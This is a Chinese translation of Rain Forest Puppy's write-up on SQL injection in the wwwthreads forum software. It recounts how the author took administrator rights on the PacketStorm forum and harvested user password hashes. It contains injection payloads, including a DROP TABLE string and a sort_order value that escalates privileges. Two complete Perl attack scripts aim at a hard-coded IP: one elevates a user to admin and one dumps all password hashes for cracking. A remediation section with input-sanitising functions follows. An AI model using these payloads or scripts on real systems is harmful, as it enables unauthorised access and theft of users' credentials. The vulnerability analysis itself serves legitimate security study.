文章翻译:isno
内容目录:
-1.问题的范围
-2.SQL攻击的详细解释
-3.解决办法
-4.结论
-5.本文涉及的perl程序
----------------------------------------------------------
----[ 1. 问题的范围
许多应用程序都可以通过SQL来进行攻击。现在许多程序知道了
避免使用strcpy(),
并且不把用户数据传递给system()调用,但是很多程序还不知道SQL
查询可以被黑客篡改来达到攻击的目的。
写一篇技术文章要比写个安全建议麻烦得多,但是技术文章能
够全面地解释我是如何利用wwwthreads程序的漏洞得到PacketStorm
论坛管理员权限和将近800个用户密码的。
----[ 2. SQL攻击的详细解释
某日,我正在PacketStorm的论坛上浏览,发现这个论坛使用的
是wwwthreads我突然注意到了URL的参数(URL中'?'后面的部分)。
作为一个web安全爱好者,我对它感到极为好奇。使用试验的攻击方
法,我把showpost.pl程序中的'Board=general' 参数改为了
'Board=rfp'。提交并发现传回来以下错误信息:
We cannot complete your request. The reason reported was:
Can't execute query:
SELECT B_Main,B_Last_Post
FROM rfp
WHERE B_Number=1
. Reason: Table 'WWWThreads.rfp' doesn't exist
可以发现这儿还有一个参数'Number=1',我们可以推断出查询
请求是这样构造的:
SELECT B_Main,B_Last_Post FROM $Board WHERE B_Number=$Number
如果你读过我在phrack 54上发表过的文章的话(可以到
http://www.wiretrip.net/rfp/p/doc.asp?id=7&iface=2阅读),你
就应该明白我要 做什么了。我们不仅可以修改$Board和$Number参数
,而且还可以提交额外的SQL命令。
试想一下,如果我们提交的$Board参数是下面的样子:
'general; DROP TABLE general; SELECT * FROM general '
那么在服务器端就会转化成:
SELECT B_Main,B_Last_Post FROM general; DROP TABLE general;
SELECT * FROM general WHERE B_Number=$Number
';'符号是SQL命令的结束符。通常我们可以使用'#'来使MySQL忽
略此行上的其它 内容。但是,'FROM'和'WHERE'是在一个分开的行上
,所以MySQL不会忽略它。考虑到错误的SQL语句会使MySQL忽略运行
后面的语句,所以我们至少要提交一个有效的命令。
在本例中,我们提交一个和原始命令相似的generic select命令,理
论上的结果应该 是删除general论坛所在的表。
但是在实际上并没有成功,并不是因为理论是错误的,而是因为
我们使用的数据库用户没有DROP权限。并且根据wwwthreads编写的方
法,它不完全允许你这么做。但是一切并没有白费,我们可以修改其
它的参数,看看哪里会出问题...而且我们可以到
www.wwwthreads.com
去下载wwwthreads的源代码(免费版)。
可以发现,免费版和正式版(PacketStorm上运行的是正式版)的
代码稍微有些不同,包括它们的SELECT声明。所以我们得有点创造性
。我们先找到和前面有关的SELECT 声明。
我喜欢使用less命令,所以我就'less showpost.pl',并且寻找
(用'/')'SELECT' 字符串。发现了:
# Grab the main post number for this thread
$query = qq!
SELECT Main,Last_Post
FROM $Board
WHERE Number=$Number
!;
Wow,就是它!除了几个参数的名字(Main,Last_Post,Number)
和前面的(B_Main, B_Last_Post,B_Number)不同。如果我们看看
它的上面,我们会发现:
# Once and a while it people try to just put a number into the url,
if (!$Number) {
w3t::not_right("There was a problem looking up the Post...
这就是对$Number参数的限制。
基于这一点让我们来看看“为什么”我们要研究它。很显然我
们有可能达到DROP表这种DOS攻击,你还有可能修改其它人的发言,
但那仍然不是我们要的。我们没准能建立 我们自己的论坛?所有
的信息都储存在数据库里。但是有许多记录要去更新。成为一个数
据库操作员怎么样?或者更进一步,成为管理员怎么样?管理员可
以增添、删除、修 改论坛、用户等。这是值得一试的,虽然你仍
然将会被限制在论坛的领域里,那是一个小的可怜的领域。
但是,这仍然有一件事情值得为它一试。如果你注册为一个
用户,你会发现你必须要输入一个密码。Hmmm...这个密码储存在
某个地方,好象是数据库里。考虑到许多人的密 码用在很多地方
,而且wwwthreads(在某些配置上的错误?)把发言者的IP地址
发到论坛上。如果我们能得到某个人的密码,就可能去攻破他的
主机。
所以,让我们来看看密码是怎么存储的。进入到论坛的“编辑
属性”页,有一个密码域,通过HTML源码看,像是有一个可怕的加
密密匙。妈的,这些密码是加密过的。这意味着你需要一个密码破
解软件和大量的时间去对密码进行解密。当然,这是假定你*能够*
得到密码...
首先我们要去获得论坛管理员权限。adduser.pl程序是我们开
始的好地方,因为它可 以让我们看到一个用户的全部参数。看看
下面的代码:
# --------------------------------------
# Check to see if this is the first user
$query = qq!
SELECT Username
FROM Users
!;
$sth = $dbh -> prepare ($query) or die "Query syntax error: $DBI::errstr.
Query: $query";
$sth -> execute() or die "Can't execute query: $query. Reason:
$DBI::errstr";
my $Status = "";
my $Security = $config{'user_security'};
my $rows = $sth -> rows;
$sth -> finish;
# -------------------------------------------------------
# If this is the first user, then status is Administrator
# otherwise they are just get normal user status.
if (!$rows){
$Status = "Administrator";
$Security = 100;
} else {
$Status = "User";
}
这段代码所做的就是看看是否定义了用户。如果没有定义用户,
增添的第一个用户就自动得到管理员权限(Status=Administrator)
和安全级别100。在这之后,再定义的所有用户就只能得到普通用户
权限(Status=User)了。所以我们要做的就是要找到一种方法使得
我们的Status=Administrator。我们可以再看看一条用户
记录的详细情况,如下:
# ------------------------------
# Put the user into the database
my $Status_q = $dbh -> quote($Status);
$Username_q = $dbh -> quote($Username);
my $Email_q = $dbh -> quote($Email);
my $Display_q = $dbh -> quote($config{'postlist'});
my $View_q = $dbh -> quote($config{'threaded'});
my $EReplies_q = $dbh -> quote("Off");
$query = qq!
INSERT INTO Users (Username,Email,Totalposts,Laston,Status,Sort,
Display,View,PostsPer,EReplies,Security,Registered)
VALUES ($Username_q,$Email_q,0,$date,$Status_q,$config{'sort'},
$Display_q,$View_q,$config{'postsperpage'},$EReplies_q,$Security,$date)
!;
现在,我得花点时间来解释一下quote()函数。当把一个值为"blah blah blah"
的字符串放入"SELECT * FROM table WHERE data=$data"时,它会成为如下样子:
SELECT * FROM table WHERE data=blah blah blah
这个SQL语句是无效的。数据库只认第一个blah,而不知道怎么处理后边的两个blah。
所以所有的字符串数据应该被压缩进单引号里(')。因此,查询命令应该像这样:
SELECT * FROM table WHERE data='blah blah blah'
这才是正确的。在我以前写的SQL安全的文章里提到过一种方法,就是使用我们自己
的单引号来打破SQL语句中的单引号。所以如果我们提交"blah blah' MORE SQL COMMANDS.."
它看起来应该是下面这个样子:
SELECT * FROM table WHERE data='blah blah' MORE SQL COMMANDS...'
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
我们提交的数据
这将使得SQL引擎把MORE SQL COMMANDS解释为实际的SQL命令,因为它
把data中的第二个单引号(我们提交的那个)当作了字符串的结束符。这是
把数据转化为是人们易于阅读的字符串的缺陷,它使得可以重解析数据...
所以SQL引擎很难分辨出哪些是数据,哪些是命令。
这对我们来说是非常有用的。如果提交一个 '',它并不是告诉SQL引
擎这是字符串的结尾,而是把它当作字符串中的一个单引号。因此如下的
查询命令:
SELECT * FROM table WHERE data='data''more data'
会使得数据库去查找"data'more data"的值。所以为了避免用户突破
字符串而去提交额外的命令,程序员应该做的就是复制两个单引号(把
'变成 '')。这能够确保提交的数据是合法数据。这也正是DBI->quote()
函数所做的——把字符串两边加上单引号,并把用户提交的单引号复制成
两个单引号。
在解释了上面这些之后,你应该明白了所有经过了quote()函数处理过
的数据就不能被利用了,因为我们无法提交额外的SQL命令或者篡改其它有
用的东西了。如果你看看源代码会发现,wwwthreads非常广泛的使用了
quote()函数,这对我们来说非常不好,但是还有机会...
你可以看到,域有不同的类型,包括字符串、布尔类型、多种数字类
型等。字符串域需要使用field='data'这样的格式,而数字域则不用
(例如,numeric_field='2'是错误的)。正确的数字域的用法应该是
numeric_field=2。啊哈!这儿没有单引号,程序甚至不能随意的加单引
号。正确的解决办法是确保所有的数字域是真正的数字(一会儿会详细
解释)。我可以给你个提示,wwwthreads没有进行正确的检查,实际上大
多数应用程序也都没有进行正确的检查。
所以,我们现在要提交一个能够篡改我们感兴趣的表的SQL语句。一
个SELECT语句是固定的,因此我们还需要另外一句其它的SQL语句。
INSERT和UPDATE就不错,因为它们已经可以修改数据了...我们要修改更
多的数据(希望如此)。
查找了半天之后,我发现一个非常好的可以利用的地方...
changeprofile.pl。这是一个用来把数据传递给editprofile.pl并把改动
写进数据库的程序。当然,改动的只是我们的用户的数据。这意味着要利
用它,就必须注册一个用户。甭管怎么样,让我们先来看一看:
# Format the query words
my $Password_q = $dbh -> quote($Password);
my $Email_q = $dbh -> quote($Email);
my $Fakeemail_q = $dbh -> quote($Fakeemail);
my $Name_q = $dbh -> quote($Name);
my $Signature_q = $dbh -> quote($Signature);
my $Homepage_q = $dbh -> quote($Homepage);
my $Occupation_q = $dbh -> quote($Occupation);
my $Hobbies_q = $dbh -> quote($Hobbies);
my $Location_q = $dbh -> quote($Location);
my $Bio_q = $dbh -> quote($Bio);
my $Username_q = $dbh -> quote($Username);
my $Display_q = $dbh -> quote($Display);
my $View_q = $dbh -> quote($View);
my $EReplies_q = $dbh -> quote($EReplies);
my $Notify_q = $dbh -> quote($Notify);
my $FontSize_q = $dbh -> quote($FontSize);
my $FontFace_q = $dbh -> quote($FontFace);
my $ICQ_q = $dbh -> quote($ICQ);
my $Post_Format_q= $dbh -> quote($Post_Format);
my $Preview_q = $dbh -> quote($Preview);
靠!几乎所有的参数都被quote()处理过了。这表示所有这些参
数对我们来说就都没用了。让我们再来看看最终被写进数据库的查
询语句:
# Update the User's profile
my $query =qq!
UPDATE Users
SET Password = $Password_q,
Email = $Email_q,
Fakeemail = $Fakeemail_q,
Name = $Name_q,
Signature = $Signature_q,
Homepage = $Homepage_q,
Occupation = $Occupation_q,
Hobbies = $Hobbies_q,
Location = $Location_q,
Bio = $Bio_q,
Sort = $Sort,
Display = $Display_q,
View = $View_q,
PostsPer = $PostsPer,
EReplies = $EReplies_q,
Notify = $Notify_q,
TextCols = $TextCols,
TextRows = $TextRows,
FontSize = $FontSize_q,
FontFace = $FontFace_q,
Extra1 = $ICQ_q,
Post_Format = $Post_Format_q,
Preview = $Preview_q
WHERE Username = $Username_q
!;
因为wwwthreads自动在用quote()处理过的变量后面加了“_q”,
所以我们很容易看出来。可以看到:$Sort, $PostsPer, $TextCols,
和 $TextRows 没有被quote()处理过。现在让我们来看看这些变量
出自哪里。
my $Sort = $FORM{'sort_order'};
my $PostsPer = $FORM{'PostsPer'};
my $TextCols = $FORM{'TextCols'};
my $TextRows = $FORM{'TextRows'};
喔,它们是直接从用户提交的数据里解析出来的。这意味着它们
没有经过任何有效性检查,这就是我们可以利用的机会了!
在回过头来看看用户记录的结构(前面已给出),我们所要改
变的是'Status'域。在这个UPDATE查询中,Status并没有被列出。
这意味着Status会保持不变。那么我们怎么办呢?花1秒中时间想一下。
记住,我们所要做的关键是要使我们提交的东西看起来像是数据,
而最终SQL引擎即数据库会把它解释成命令。注意一下,查询语句中域
是按这种形式列出来的:
field=value, field=value, field=value, 等等(当然,它们被分
隔在不同的行)。如果我插入一些伪造的值,(处于举例的缘故)
我会有:
Name='rfp', Signature='rfp', Homepage='
www.wiretrip.net/rfp/'
我所要做的就是把这些值放在同一行上,去掉空格,并把它们
放进字符串值里,这是合法的SQL语句。
现在让我们把所有一切和在一起。注意'Sort'变量,它是数
字类型的,我们这样提交:
Bio='puppy', Sort=5, Display='threaded'
这仍然是合法的SQL语句。因为$Sort=$FORM{'sort_order'},这
意味着要达到上面的Sort值,我们应该提交一个sort_order=5的参
数。现在我们就利用Sort来达到我们的攻击目的。我们要做的是包
含一个逗号和其它的语句。假定要改变Status域的话,我们就应该
提交一个值为"5, Status='Administrator',"的sort_order参数,
当它经过程序处理流程后,最终会变成这个样子:
Bio='puppy', Sort=5, Status='Administrator', Display='threaded'
^^^^^^^^^^^^^^^^^^^^^^^^^^
我们提交的数据
这仍然是合法的SQL语句。而且这个语句会令数据库把Status域
升级为'Administrator'!别忘了我们前面看过的adduser.pl程序,第
一个用户的安全级别是100。我们也要100的安全级别,所以我们就把
sort_order参数设置成"5, Status='Administrator', Security=100,"
那么我们就会得到:
Bio='puppy', Sort=5, Status='Administrator', Security=100, ...
这就更新了所有我们想要的值。数据库不知道我们的诡计,就会
更新这两个域,并把这个用户升级为论坛管理员。
于是我们就把这种攻击技术用到了PacketStorm论坛上...结果
对changeprofile.pl请求得到了一个404错误。恩,看来前面看的
那个版本没有这个问题。我又去看了看'Edit Profile'菜单,我看
它有'Basic Profile'、'Display Preferences'、和
'Email Notifications/Subscriptions'这几个demo版所没有的东西。
如果它们能改变脚本的话,它们也同样能够改变SQL查询语句(实际
上它们必须能够)。于是我们现在进入“黑盒子”状态(进行猜测
性尝试,看看结果会怎样)。因为我们仍然对sort_order参数进行尝试,
你可以看到它包含在'Display Preferences'脚本里(editdisplay.pl)。
这个脚本处理sort_order, display, view, PostPer, Post_Format,
Preview, TextCols,TextRows, FontSize, FontFace, PictureView,
和 PicturePost这几个参数(通过查看HTML源码得到)。它是参数
的一个子集。使用上面的代码片段,我们可以猜到SQL查询是什么样
子的。所以马上开火!
首先我把一些非法的值放进sort_order参数(用字符串而不
是数字)。这当然将返回错误,我们就可以检查错误信息。在第
一个例子里的'Board'表前加了'B_'前缀,'User'表前加了'U_'
前缀。所以可以推断出我们应该使用'U_Status'和'U_Security'
作为域的名字。太棒了!
为了提交一个合法的命令,我们需要提交前面列出来的所有
那些值。应该指出我们需要一个合法的用户帐号来改变它的权限
。所以我们要有用户名和密码(加密过的),从editdisplay.pl
中可以发现,它们的参数应该是Username和Oldpass。于是基于
上面 说过的全部,我们应该提交一个这样的URL:
changedisplay.pl? Cat=&
Username=rfp
&Oldpass=(加密过的密码)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100
&display=threaded
&view=collapsed
&PostsPer=10
&Post_Format=top
&Preview=on
&TextCols=60
&TextRows=5
&FontSize=0
&FontFace=
&PictureView=on
&PicturePost=off
其中最重要的一个参数是:
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100
这就是我们所要改变的数据库部分(%3d等于'='字符)。如果把
上面的URL合成 一个字符串,你会得到:
changedisplay.pl?Cat=&Username=rfp&Oldpass=(加密过的密码)
&sort_order=5,U_Status%3d'Administrator',U_Security%3d100&display=threaded
&view=collapsed&PostsPer=10&Post_Format=top&Preview=on&TextCols=60
&TextRows=5&FontSize=0&FontFace=&PictureView=on&PicturePost=off
这就是所有全部的东西了,于是我把它提交到PacketStorm论坛,并且得到:
Your display preferences have been modified.
再注意一下顶部上的菜单,我已经看到了'Admin'菜单。我点击
了这个菜单,看到一行令我心中温暖的信息:
As an Administrator the following options are available to you.
太棒了!管理员权限!看看我的选项,我可以编辑用户、留言板
和论坛,指派操 作员和管理员权限,禁止用户/主机,终止/关闭/打
开线程,等等。
现在进行我们的第二个目标...密码!我进入到'Show/Edit Users'
菜单,并被要求选择我赶兴趣的用户名的第一个字母。于是我选择了
‘R’,所以以R开头的用户全都被列了出来,我选择了'rfp'。然后
出现了我的加密过的密码。不幸的是,要得到全部的用户名和密码
是件极为麻烦的事,于是我就写了个perl脚本来自动做。所有得到的
密码都保存为可以直接用john the ripper来解密的形式。
----[ 3. 解决办法
那么怎么避免出现这种问题呢?你可以看到,出现这种问题的原
因在于对传给SQL查询的数据没有做限制。虽然wwwthreads对大部分
数据使用了quote()处理,但是它没有对数字类型的数据进行处理。
解决的办法就是确保传递过来的数字类型值是真正的数字
类型。你可以用如下函数来处理:
sub onlynumbers {
($data=shift)=~tr/0-9//cd;
return $data;}
就像把字符串传递给DBI->quote()函数来处理一样,也把所有的
数字类型值传递给onlynumbers()处理。在上面的例子中,就用以下语句:
my $Sort = onlynumbers($FORM{'sort_order'});
另一个需要验证的地方是表名。在本文开头的例子中,可以看
到那个'Board=general'参数。这个表名并没有用quote()来处理,
因此我们也需要对所有的表名用一个函数来进行处理。假设我们
允许表名含有数字、字符等,可以用下面语句处理:
sub scrubtable {
($data=shift)=~tr/a-zA-Z0-9.//cd;
return $data;}
最后要说的是,*所有*(强调是“所有”)用户传来的数据都
必须经过quote()、()、 onlynumbers() 或者 scrubtable()等来
进行处理...绝对不能有例外。如果直接把用户数据传递给SQL查询
语句就会造成攻击者修改你的数据库。
新版本的wwwthreads可以在
www.wwwthreads.com,它已经修
复了这个漏洞,就和我前边所建议的一样。
----[ 4. 结论
下面包含了两个perl程序。wwwthreads.pl用来对有漏洞
的wwwthreads发起攻击查询。你只需要知道要攻击的IP、用户名
和密码。w3tpass.pl用来下载所有的wwwthreads的用户密码,并把
它们转化成可以用john the ripper来解密的格式。
感谢PacketStorm提供了这个漏洞的试验场所!
- Rain Forest Puppy /
rfp@wiretrip.net
----[ 5. 本文涉及的perl程序
-[ wwwthreads.pl
#!/usr/bin/perl
# wwwthreads hack by
rfp@wiretrip.net
# elevate a user to admin status
#
# by rain forest puppy /
rfp@wiretrip.net
use Socket;
#####################################################
# modify these
# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$sadklfjasdkfhjaskdjflh";
#####################################################
$parms="Cat=&Username=$username&Oldpass=$passhash".
"&sort_order=5,U_Status%3d'Administrator',U_Security%3d100".
"&display=threaded&view=collapsed&PostsPer=10".
"&Post_Format=top&Preview=on&TextCols=60&TextRows=5&FontSize=0".
"&FontFace=&PictureView=on&PicturePost=off";
$tosend="GET /cgi-bin/wwwthreads/changedisplay.pl?$parms HTTP/1.0\r\n".
"Referer:
http://$ip/cgi-bin/wwwthreads/previewpost.pl\r\n\r\n";
print sendraw($tosend);
sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=< S>;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
-[ w3tpass.pl
#!/usr/bin/perl
# download all wwwthread usernames/passwords once you're administrator
# send a fake cookie with authenciation and fake the referer
# initial passwords are 6 chars long, contain a-zA-Z0-9 EXCEPT l,O,1
#
# by rain forest puppy /
rfp@wiretrip.net
use Socket;
#####################################################
# modify these
# can be DNS or IP address
$ip="209.143.242.119";
$username="rfp";
# remember to put a '\' before the '$' characters
$passhash="\$1\$V2\$zxcvzxvczxcvzxvczxcv";
#####################################################
@letts=split(//,'0ABCDEFGHIJKLMNOPQRSTUVWXYZ');
print STDERR "wwwthreads password snatcher by rain forest puppy\r\n";
print STDERR "Getting initial user lists...";
foreach $let (@letts){
$parms="Cat=&Start=$let";
$tosend="GET /cgi-bin/wwwthreads/admin/showusers.pl?$parms HTTP/1.0\r\n".
"Referer:
http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";
my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/showoneuser\.pl\?User=([^"]+)\"\>/){
push @users, $1;}}}
$usercount=@users;
print STDERR "$usercount users retrieved.\r\n".
"Fetching individual passwords...\r\n";
foreach $user (@users){
$parms="User=$user";
$tosend="GET /cgi-bin/wwwthreads/admin/showoneuser.pl?$parms HTTP/1.0\r\n".
"Referer:
http://$ip/cgi-bin/wwwthreads/\r\n".
"Cookie: Username=$username; Password=$passhash\r\n\r\n";
my @D=sendraw($tosend);
foreach $line (@D){
if($line=~/OldPass value = "([^"]+)"/){
($pass=$1)=~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
$user =~ s/%([a-fA-F0-9][a-fA-F0-9])/pack("C", hex($1))/eg;
print $user.':'.$pass."::::::::::\n";
last;}}}
print STDERR "done.\r\n\r\n";
sub sendraw {
my ($pstr)=@_; my $target;
$target= inet_aton($ip) || die("inet_aton problems");
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
die("Socket problems\n");
if(connect(S,pack "SnA4x8",2,80,$target)){
select(S); $|=1;
print $pstr; my @in=< S>;
select(STDOUT); close(S);
return @in;
} else { die("Can't connect...\n"); }}
# 感谢所有使用了RDS漏洞来攻击网站的人们(只是一小撮人)
